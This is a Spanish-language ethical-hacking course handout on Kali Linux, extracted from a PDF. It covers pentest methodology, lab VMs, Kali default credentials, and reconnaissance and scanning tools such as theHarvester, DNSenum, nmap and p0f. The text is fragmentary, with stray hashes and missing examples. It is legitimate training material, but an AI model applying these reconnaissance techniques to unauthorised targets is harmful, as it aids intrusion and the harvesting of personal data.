Kali Linux v3 Alonso ReYDeS
Kali Linux v3 Alonso ReYDeS
Kali Linux v3 Alonso ReYDeS
Alonso Eduardo
Caballero Quezada
Correo electrónico: [email protected]
Sitio web: www.reydes.com
https://www.linkedin.com/in/alonsocaballeroquezada/
https://www.facebook.com/alonsoreydes
https://twitter.com/Alonso_ReYDeS
https://www.youtube.com/c/AlonsoCaballero
https://www.instagram.com/alonso_reydes/
https://www.reydes.com
https://www.reydes.com/d/?q=contact
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Temario
Material Necesario ................................................................................................................................ 4
5. Descubrimiento …… ....................................................................................................................... 33
6. Enumeración ......................................................................................................…………............... 41
8. Explotación ..................................................................…………...................................................... 60
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 3
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Material Necesario
Para desarrollar adecuadamente el presente documento, se sugiere instalar y configurar las
máquinas virtuales de Kali Linux y Metasploitable 2, y sea utilizando VirtualBox, VMware Player, u
otro software para virtualización.
https://images.kali.org/virtual-images/kali-linux-2021.2-virtualbox-amd64.ova
https://images.kali.org/virtual-images/kali-linux-2021.2-virtualbox-i386.ova
• Metasploitable 2.
Enlace: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
VirtualBox
Enlace: https://www.virtualbox.org/wiki/Downloads
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 4
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 5
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Una Prueba de Penetración (Penetration Testing) es el proceso utilizado para realizar una evaluación
o auditoría de seguridad de alto nivel. Una metodología define un conjunto de reglas, prácticas,
procedimientos y métodos a seguir e implementar durante la realización de cualquier programa para
auditoría en seguridad de la información. Una metodología para pruebas de penetración define una
hoja de ruta con ideas útiles y prácticas comprobadas, las cuales deben ser manejadas
cuidadosamente para poder evaluar correctamente los sistemas de seguridad.
Existen diferentes tipos de Pruebas de Penetración, las más comunes y aceptadas son las Pruebas
de Penetración de Caja Negra (Black-Box), las Pruebas de Penetración de Caja Blanca (White-Box) y
las Pruebas de Penetración de Caja Gris (Grey-Box).
El equipo de pruebas cuenta con acceso para evaluar las redes, y se le ha proporcionado los
de diagramas de la red, además de detalles sobre el hardware, sistemas operativos,
aplicaciones, entre otra información antes de realizar las pruebas. Esto no iguala a una prueba
sin conocimiento, pero puede acelerar el proceso en gran magnitud, con el propósito de
obtener resultados más precisos. La cantidad de conocimiento previo permite realizar las
pruebas contra sistemas operativos específicos, aplicaciones y dispositivos residiendo en la
red, en lugar de invertir tiempo enumerando aquello lo cual podría posiblemente estar en la
red. Este tipo de prueba equipara una situación donde el atacante puede tener conocimiento
completo sobre la red interna.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 6
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
adecuados a nivel de usuario y una cuenta de usuario, además de permitirle acceso a la red
interna.
La principal diferencia entre una evaluación de vulnerabilidades y una prueba de penetración, radica
en el hecho de las pruebas de penetración van más allá del nivel donde únicamente de identifican las
vulnerabilidades, y van hacia el proceso de su explotación, escalado de privilegios, y mantener el
acceso en el sistema objetivo. Mientras una evaluación de vulnerabilidades proporciona una amplia
visión sobre las fallas existentes en los sistemas, pero sin medir el impacto real de estas
vulnerabilidades para los sistemas objetivos de la evaluación
Existen diversas metodologías open source, o libres las cuales tratan de dirigir o guiar los
requerimientos de las evaluaciones en seguridad. La idea principal de utilizar una metodología
durante una evaluación, es ejecutar diferentes tipos de pruebas paso a paso, para poder juzgar con
una alta precisión la seguridad de los sistemas. Entre estas metodologías se enumeran las
siguientes:
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 7
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
04141082c48b3211b780ac532ead7dd536b88395e6ad114e3c4e98bebb6b55ec
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 8
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
2. Máquinas Vulnerables
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 9
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Nada puede ser mejor a tener un laboratorio donde practicar los conocimientos adquiridos sobre
Pruebas de Penetración. Esto aunado a la facilidad proporciona por el software para realizar
virtualización, lo cual hace bastante sencillo crear una máquina virtual vulnerable personalizada o
descargar desde Internet una máquina virtual vulnerable.
• Metasploitable 3
Enlace de descarga:
https://github.com/rapid7/metasploitable3
• Metasploitable2
Enlace de descarga:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
• Metasploitable
Enlace de descarga:
https://www.vulnhub.com/entry/metasploitable-1,28/
Vulnhub proporciona materiales que permiten a cualquier interesado ganar experiencia práctica en
seguridad digital, software de computadora y administración de redes. Incluye un extenso catálogo de
maquinas virtuales y “cosas” las cuales se pueden de manera legal; romper, “hackear”, comprometer
y explotar.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 10
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
incluyendo sistemas operativos factibles de ser descargados y evaluados por un tiempo limitado.
Metasploitable 2 es una máquina virtual basada en el sistema operativo GNU/Linux Ubuntu, creada
intencionalmente para ser vulnerable. Esta máquina virtual puede ser utilizada para realizar
entrenamientos en seguridad, evaluar herramientas de seguridad, y practicar técnicas comunes en
pruebas de penetración.
Esta máquina virtual nunca debe ser expuesta a una red poco fiable, se sugiere utilizarla en modos
NAT o Host-only.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 11
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
c3428178e028771de6577881488b7b7bd52cd39e5975525f3792c4f3dc2f1012
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 12
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 13
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Kali Linux es una distribución basada en GNU/Linux Debian, orientado a auditorias de seguridad y
pruebas de penetración avanzadas. Kali Linux contiene cientos de herramientas, las cuales están
destinadas hacia varias tareas en seguridad de la información, como pruebas de penetración,
investigación en seguridad, forense de computadoras, e ingeniería inversa. Kali Linux ha sido
desarrollado, fundado y mantenido por Offensive Security, una compañía de entrenamiento en
seguridad de la información.
Kali Linux fue publicado en 13 de marzo del año 2013, como una reconstrucción completa de
BackTrack Linux, adhiriéndose completamente con los estándares del desarrollo de Debian.
Este documento proporciona una excelente guía práctica para utilizar las herramientas más populares
incluidas en Kali Linux, las cuales abarcan las bases para realizar pruebas de penetración. Así mismo
este documento es una excelente fuente de conocimiento tanto para profesionales inmersos en el
tema, como para los novatos.
Kali Linux es una completa reconstrucción de BackTrack Linux, y se adhiere completamente a los
estándares de desarrollo de Debian. Se ha puesto en funcionamiento toda una nueva infraestructura,
todas las herramientas han sido revisadas y empaquetadas, y se utiliza ahora Git para el VCS.
• Incluye más de 600 herramientas para pruebas de penetración: Después de revisar cada
herramienta incluida en BackTrack, se eliminaron un gran número de herramientas, las cuales
ya sea simplemente no funcionaban o duplicaban lo proporcionado por otras herramienta de
funcionalidades similares.
• Es Libre y siempre lo será: Kali Linux como BackTrack, es completamente libre de cargo, y
siempre lo será. Nunca se pagará por Kali Linux.
• Árbol Git Open Source: Se está comprometido con el módulo para el desarrollo de fuente
abierta, y el árbol de desarrollo esta disponible para todos lo vean. Todo el código fuente
incluido en Kali Linux, está disponible para cualquiera quien requiera modificar o reconstruir
los paquetes para satisfacer necesidades específicas.
• Cumplimiento con FHS: Kali Linux se adhiere al Estándar para la Jerarquía de Sistema de
Archivos (Filesystem Hierarchy Standard), permitiendo a los usuarios de Linux fácilmente
localizar binarios, archivos de soporte, librerías, etc.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 14
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
• Amplio soporte para dispositivos inalámbricos: Un tema delicado con las distribuciones
Linux es el soporte para la interfaces inalámbricas. Se ha construido Kali Linux para soportar
tantos dispositivos inalámbricos como sea posible, permitiendo la ejecución apropiada de una
amplia diversidad de hardware, haciéndolo compatible con numerosos dispositivos USB entre
otros.
• Paquetes y repositorios están firmados con GPG: Cada paquete en Kali Linux está firmado
por cada desarrollador individual, quien lo construye y envía, y los repositorios
subsecuentemente firman el paquete también.
• Soporta múltiples lenguajes: Aunque las herramientas para pruebas de penetración tienden
a ser escritas en inglés, se ha asegurado Kali linux incluya un verdadero soporte
multilenguaje, permitiendo a más usuarios operarlo en su lenguaje nativo, y localizar las
herramientas necesarias para su trabajo.
Kali Linux está específicamente diseñado para las necesidades de los profesionales en pruebas de
penetración, y por lo tanto toda la documentación asume un conocimiento previo, y familiaridad con el
sistema operativo Linux en general.
Nunca descargar las imágenes de Kali Linux desde otro lugar diferente a las fuentes oficiales.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 15
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Siempre asegurarse de verificar las sumas de verificación SHA256 de loas archivos descargados,
comparándolos contra los valores oficiales. Podría ser fácil para una entidad maliciosa modificar una
instalación de Kali Linux conteniendo “exploits” o malware y hospedarlos de manera no oficial.
Kali Linux puede ser descargado como imágenes ISO para computadoras basadas en Intel, esto para
arquitecturas de 32-bits o 64 bits. También puede ser descargado como máquinas virtuales
previamente construidas para VMware Player y VirtualBox. Finalmente también existen imágenes
para la arquitectura ARM, los cuales están disponibles para una amplia diversidad de dispositivos.
https://www.kali.org/get-kali/
Kali Linux puede ser instalado en un un disco duro como cualquier distribución GNU/Linux, también
puede ser instalado y configurado para realizar un arranque dual con un Sistema Operativo Windows,
de la misma manera puede ser instalado en una unidad USB, o instalado en un disco cifrado.
Se sugiere revisar la información detallada sobre las diversas opciones de instalación para Kali Linux,
en la siguiente página: https://www.kali.org/docs/installation/
Kali Linux ha cambiado su política de usuario no root por defecto desde la liberación 2020.1. Esto
significa:
Durante la instalación de imágenes amd64 e i386, consultará por la creación de una cuenta de
usuario estándar.
Cualquier credencial por defecto del sistema operativo utilizando durante un inicio en vivo, o imagen
previamente creada (como Máquina Virtual y ARM) será:
• User: kali
• Password: kali
• Username: vagrant
• Password: vagrant
Amazon EC2:
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 16
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
• User: kali
• Password: <ssh key>
El comando sudo permite a un usuario ejecutar un comando como superusuario u otro usuario, como
es especificado en las políticas de seguridad
$ sudo ping
[sudo] password for kali:
Kali Linux incluye algunos servicios de red, lo cuales son útiles en diversos escenarios, los cuales
están deshabilitadas por defecto. Entre los servicios factibles de ser instalados y configurados en Kali
Linux se enumeran: HTTP, Mestaploit, PostgreSQL, OpenVAS , SSH, entre muchos otros más.
Estos servicios también pueden iniciados y detenidos desde el menú: Applications -> Kali Linux -> 14
- System Services.
Kali Linux proporciona documentación oficial sobre varios de sus aspectos y características. La
documentación está en constante trabajo y progreso. Esta documentación puede ser ubicada en la
siguiente página:
https://docs.kali.org/
9520332a8ab01e019db938524700fe3f2586a7b536f78e14cf5f0dabd5c068e9
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 17
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Kali Linux contiene una gran cantidad de herramientas obtenidas desde diferente fuentes
relacionadas al campo de la seguridad y forense.
En el sitio web de Kali Linux se proporciona una lista de todas estas herramientas y una referencia
rápida de las mismas.
https://tools.kali.org/
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 18
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
4. Capturar Información
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 19
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
En esta fase se intenta recolectar la mayor cantidad de información posible sobre el objetivo en
evaluación, como posibles nombres de usuarios, direcciones IP, servidores de nombre, y otra
información relevante. Durante esta fase cada fragmento de información obtenida es importante y no
debe ser subestimada. Tener en consideración, la recolección de una mayor cantidad de información,
generará una mayor probabilidad para un ataque satisfactorio.
El proceso donde se captura la información puede ser dividido de dos maneras. La captura de
información activa y la captura de información pasiva. En el primera forma se recolecta información
enviando tráfico hacia la red objetivo, como por ejemplo realizar ping ICMP, y escaneos de puertos
TCP/UDP. Para el segundo caso se obtiene información sobre la red objetivo utilizando servicios o
fuentes de terceros, como por ejemplo motores de búsqueda como Google y Bing, o utilizando redes
sociales como Facebook o LinkedIn.
Existen diversos recursos públicos en Internet , los cuales pueden ser utilizados para recolectar
información sobre el objetivo en evaluación. La ventaja de utilizar este tipo de recursos es la no
generación de tráfico directo hacia el objetivo, de esta manera se minimizan la probabilidades de ser
detectados. Algunas fuentes públicas de referencia son:
• Netcraft:
https://searchdns.netcraft.com/
• Robtex
https://www.robtex.com/
• CentralOps
https://centralops.net/co/
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 20
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Imagen 4-1. Información obtenida desde The Wayback Machine sobre un dominio.
Se utilizan herramientas para recolectar información o metadatos desde los documentos disponibles
en el sitio web del objetivo en evaluación. Para este propósito se puede utilizar también un motor de
búsqueda como Google.
Metagoofil
http://www.edge-security.com/metagoofil.php
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 21
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Metagoofil realizará una búsqueda en Google para identificar y descargar documentos hacia el disco
local, y luego extraerá los metadatos con diferentes librerías como Hachoir, PdfMiner y otros. Con los
resultados se generará un reporte con los nombres de usuarios, versiones y software, y servidores o
nombres de las máquinas, las cuales ayudarán a los profesionales en pruebas de penetración en la
fase para la captura de información.
$ sudo metagoofil
$ mkdir /tmp/archivos_pdf/
La opción “-t” define el tipo de archivo a descargar (pdf, doc, xls, ppt, odp, ods, docx, pptx, xlsx)
La opción “-o” define un directorio de trabajo (La ubicación para guardar los archivos descargados).
c137992c7a7205c69dffc4b8fa8bb2b574c8652ed108b5d3b48e17b85b3f7865
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 22
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
DNSenum
https://github.com/fwaeytens/dnsenum
El propósito de DNSenum es capturar tanta información como sea posible sobre un dominio.
Realizando actualmente las siguientes operaciones: Obtener las direcciones IP del host (Registro A).
Obtener los servidores de nombres. Obtener el registro MX. Realizar consultas AXFR sobre
servidores de nombres y versiones de BIND. Obtener nombres adicionales y subdominios mediante
Google (“allinurl -www site:dominio”). Fuerza bruta a subdominios de un archivo, puede también
realizar recursividad sobre subdominios los cuales tengan registros NS. Calcular los rangos de red de
dominios en clase y realizar consultas whois sobre ellos. Realizar consultas inversas sobre rangos de
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 23
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
red (clase C y/o rangos de red). Escribir hacia un archivo domain_ips.txt los bloques IP.
$ dnsenum -h
La opción “--threads” define el número de hilos que realizarán las diferentes consultas.
La opción “-s” define el número máximo de subdominios a ser arrastrados desde Google.
La opción “-w” realiza consultas Whois sobre los rangos de red de la clase C.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 24
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
fierce
https://www.aldeid.com/wiki/Fierce
Fierce es una escaner semi ligero para realizar una enumeración, la cual ayude a los profesionales en
pruebas de penetración, a localizar espacios IP y nombres de host no continuos para dominios
específicos, utilizando cosas como DNS, Whois y ARIN. En realidad se trata de un precursor de las
herramientas activas para pruebas como; nmap, unicornscan, nessus, nikto, etc, pues todos estos
requieren se conozcan el espacio de direcciones IP por los cuales se buscará. Fierce no realiza
explotació, y no escanea indiscriminadamente todas Internet. Está destinada específicamente a
localizar objetivos, ya sea dentro y fuera de la red corporativa. Dado el hecho utiliza principalmente
DNS, frecuentemente se encontrará redes mal configuradas, las cuales exponen el espacio de
direcciones internas.
4dd28d1e8618bade51d9919ab94cbb52d2a207a7657e81e0b829b0e02e1f185a
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 25
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Dmitry
https://linux.die.net/man/1/dmitry
Dmitry (Deepmagic Information Gathering Tool) es una programa en línea de comando para Linux, el
cual permite capturar tanta información como sea posible sobre un host, desde un simple Whois
hasta reportes del tiempo de funcionamiento o escaneo de puertos.
$ dmitry
La opción “-e” permite realizar una búsqueda de todas las posibles direcciones de correo electrónico.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 26
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Aunque existe una opción en Dmitry, la cual permitiría obtener información sobre el dominio desde el
sitio web de Netcraft, ya no es funcional. Pero la información puede ser obtenida directamente desde
el sitio web de Netcraft.
https://searchdns.netcraft.com/
52ca970b1459c2276d85148e6b8b03384664776dc20af5a9a5f5363a445c81a4
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 27
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
traceroute
https://linux.die.net/man/8/traceroute
Traceroute rastrea la ruta tomada por los paquetes desde una red IP, en su camino hacia un host
especificado. Este utiliza el campo TTL (Time To Live) del protocolo IP, e intenta provocar una
respuesta ICMP TIME_EXCEEDED desde cada pasarela a través de la ruta hacia el host.
El único parámetro requerido es el nombre o dirección IP del host de destino. La longitud del paquete
opcional es el tamaño total del paquete de prueba (por defecto 60 bytes para IPv4 y 80 para IPv6). El
tamaño especificado puede ser ignorado en algunas situaciones o incrementado hasta un valor
mínimo.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 28
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
La versión de traceroute en los sistemas GNU/Linux utiliza por defecto paquetes UDP.
$ traceroute --help
Tcptraceroute
https://linux.die.net/man/1/tcptraceroute
tcptraceroute es una implementación de la herramienta traceroute, la cual utiliza paquetes TCP para
trazar la ruta hacia el host objetivo. Traceroute tradicionalmente envía ya sea paquetes UDP o
paquetes ICMP ECHO con un TTL a uno, e incrementa el TTL hasta el destino sea alcanzado.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 29
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
$ tcptraceroute -h
theHarvester
https://github.com/laramies/theHarvester
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 30
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
electrónico, hosts virtuales, banners de puertos abiertos, y nombres de empleados desde diferentes
fuentes públicas (motores de búsqueda, servidores de llaves pgp).
Las fuentes son; Treatcrowd, crtsh, google, googleCSW, google-profiles, bing, bingapi, dogpile, pgp,
linkein, vhost, twitter, googleplus, yahoo, baidu, y shodan.
$ sudo theHarvester -h
La opción “-b” define la fuente de datos (google, bing, bingapi, pgp, linkedin, google-profiles,
people123, jigsaw, all).
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 31
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
e064085ef8deaad6a19432062ffcccb45192f87a2ede8bedeb6c43d03e528c33
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 32
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
5. Descubrimiento
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 33
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Después de recolectar la mayor cantidad de información sobre la red objetivo desde fuentes externas;
como motores de búsqueda; es necesario descubrir ahora las máquinas activas en el objetivo de
evaluación. Es decir encontrar cuales son las máquinas disponibles o en funcionamiento, caso
contrario no será posible continuar analizándolas, y se deberá continuar con la siguientes máquinas.
También se debe obtener indicios sobre el tipo y versión del sistema operativo utilizado por el
objetivo. Toda esta información será de mucha ayuda para el proceso donde se deben mapear las
vulnerabilidades.
nmap
https://nmap.org/
Nmap “Network Mapper” o Mapeador de Puertos, es una herramienta open source para la
exploración de redes y auditorías de seguridad. Nmap utiliza paquetes IP en bruto de maneras
novedosas para determinar cuales host están disponibles en la red, cuales servicios (nombre y
versión) estos hosts ofrecen, cuales sistemas operativos (y versión de SO) están ejecutándo, cual tipo
de firewall y filtros de paquetes utilizan. Ha sido diseñado para escanear velozmente redes de gran
envergadura, consecuentemente funciona también host únicos.
$ nmap -h
La opción “-sn” le indica a nmap a no realizar un escaneo de puertos después del descubrimiento del
host, y solo imprimir los hosts disponibles que respondieron al escaneo.
La opción “-n” le indica a nmap a no realizar una resolución inversa al DNS sobre las direcciones IP
activas que encuentre.
Nota: Cuando un usuario privilegiado intenta escanear objetivos sobre una red ethernet local, se
utilizan peticiones ARP, a menos sea especificada la opción “--send-ip”, la cual indica a nmap a enviar
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 34
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
nping
https://nmap.org/nping/
Nping es una herramienta open source para la generación de paquetes de red, análisis de respuesta
y realizar mediciones en el tiempo de respuesta. Nping puede generar paquetes de red de para una
diversidad de protocolos, permitiendo a los usuarios, permitiendo a los usuarios un completo control
sobre las cabeceras de los protocolos. Mientras Nping puede ser utilizado como una simple utilidad
ping para detectar host activos, también puede ser utilizada como un generador de paquetes en bruto
para pruebas de estrés para la pila de red, envenenamiento del cache ARP, ataque para la negación
de servicio, trazado de la red, ec. Nping también permite un modo eco novato, lo cual permite a los
usuarios ver como los paquetes cambian en tránsito entre los host de origen y de destino. Esto es
muy bueno para entender las reglas del firewall, detectar corrupción de paquetes, y más.
$ nping -h
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 35
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
nping utiliza por defecto el protocolo ICMP. En caso el host objetivo esté bloqueando este protocolo,
se puede utilizar el modo de prueba TCP.
La opción “--tcp” es el modo que permite al usuario crear y enviar cualquier tipo de paquete TCP.
Estos paquetes se envían incrustados en paquetes IP que pueden también ser afinados
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 36
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Este procedimiento trata de determinar el sistema operativo funcionando en los objetivos activos, para
conocer el tipo y versión del sistema operativo a intentar penetrar.
Nmap
https://nmap.org/
Una de las características mejores conocidas de Nmap es la detección remota del Sistema Operativo
utilizando el reconocimiento de la huella correspondiente a la pila TCP/IP. Nmap envía un serie de
paquetes TCP y UDP hacia el host remoto y examina prácticamente cada bit en las respuestas.
Después de realizar docenas de pruebas como muestreo ISN TCP, soporte de opciones TCP y
ordenamiento, muestreo ID IP, y verificación inicial del tamaño de ventana, Nmap compara los
resultados con su base de datos, la cual incluye más de 2,600 huellas para Sistemas Operativos
conocidos, e imprime los detalles del Sistema Operativo si existe una coincidencia.
La opción “-O” permite la detección del Sistema Operativo enviando un serie de paquetes TCP y UDP
al host remoto, para luego examinar prácticamente cualquier bit en las respuestas.
Adicionalmente se puede utilizar la opción “-A” para habilitar la detección del Sistema Operativo junto
con otras cosas.
0b278ef6c67b3c94b092d860a6494dd7b05023dea9ad77c869ee50e2bd96b0c4
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 37
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Imagen 5-3. Información del Sistema Operativo de Metasploitable2, obtenidos por nmap.
P0f
https://lcamtuf.coredump.cx/p0f3/
P0f es una herramienta la cual utiliza un arreglo de mecanismos sofisticados puramente pasivas de
tráfico, para identificar los implicados detrás de cualquier comunicación TCP/IP incidental
(frecuentemente algo tan pequeño como un SYN normal, sin interferir de ninguna manera. La versión
3 es una completa rescritura del código base original, incorporando un número significativo de
mejoras para el reconocimiento de la huella a nivel de red, y presentado la capacidad de razonar
sobre las cargas útiles a nivel de aplicación (por ejemplo HTTP).
$ sudo p0f -h
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 38
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
La opción “-d” genera un bifurcación en segundo plano, esto requiere usar la opción “-o” o “-s”.
b3c360b65ed0777544bb2b23adb49fdb5f3f7ed8550e1e0ecc8c3cd81713f2a4
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 39
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Para obtener resultados similares a los expuestos en la Imagen 6-5, se debe establecer una conexión
hacia puerto 80 de Metasploitable2 utilizando el siguiente comando, o también utilizando un naevador
web.
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 40
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
6. Enumeración
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 41
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
Teniendo conocimiento del rango de la red y las máquinas activas en el objetivo de evaluación, es
momento de proceder con el escaneo de puertos para obtener un listado de los puertos TCP y UDP
en estado abierto o de atención.
Existen diversas técnicas para realizar el escaneo de puertos, entre las más comunes se enumeran
las siguientes:
nmap
https://nmap.org/
Muchos de los tipos de escaneo con Nmap están únicamente disponibles para usuarios privilegiados.
Esto es porque se envía y recibe paquetes en bruto, lo cual requiere acceso como root en sistemas
Linux. Usando una cuenta administrador en Windows es recomendado, aunque Nmap algunas veces
funciona para usuarios no privilegiados sobre una plataforma cuando WinPcap ya ha sido cargado en
el Sistema Operativo.
Mientras Nmap intenta producir resultados precisos, se debe considerar todos el conocimiento se
basan en los paquetes retornados por los máquinas objetivos (o firewalls en frente de estos). Tales
hosts pueden ser poco fiables, y enviar respuestas destinadas a confundir a Nmap. Muchos más
comunes son los hosts no compatibles con el RFC, los cuales no responden como deberían a las
pruebas de Nmap. Los escaneos FIN, NULL, y Xmas son particularmente susceptibles a este
problema. Tales problemas son específicos hacia ciertos tipos de escaneo.
Por defecto nmap utiliza un escaneo SYN, pero este es substituido por un escaneo Connect si el
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 42
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
usuario no tiene los privilegios necesarios para enviar paquetes en bruto. Además de no especificarse
los puertos, se escanean los 1,000 puertos más populares.
Imagen 6-1. Información obtenida con una escaneo por defecto utilizando nmap
Para definir un conjunto de puertos a escanear contra un objetivo, se debe utilizar la opción “-p” de
nmap, seguido de la lista de puertos o rango de puertos.
$ nmap -p 80 192.168.0.0/24
Sitio Web: www.ReYDeS.com -:- e-mail: [email protected] -:- Teléfono: +51 949 304 030 43
Alonso Eduardo Caballero Quezada - Instructor y Consultor en Hacking Ético & Forense Digital
La opción “-oA” le indica a nmap a guardar a la vez los resultados del escaneo en el formato normal,
formato XML, y formato manejable con el comando “grep”. Estos serán respectivamente almacenados
en archivos con las extensiones nmap, xml, gnmap.
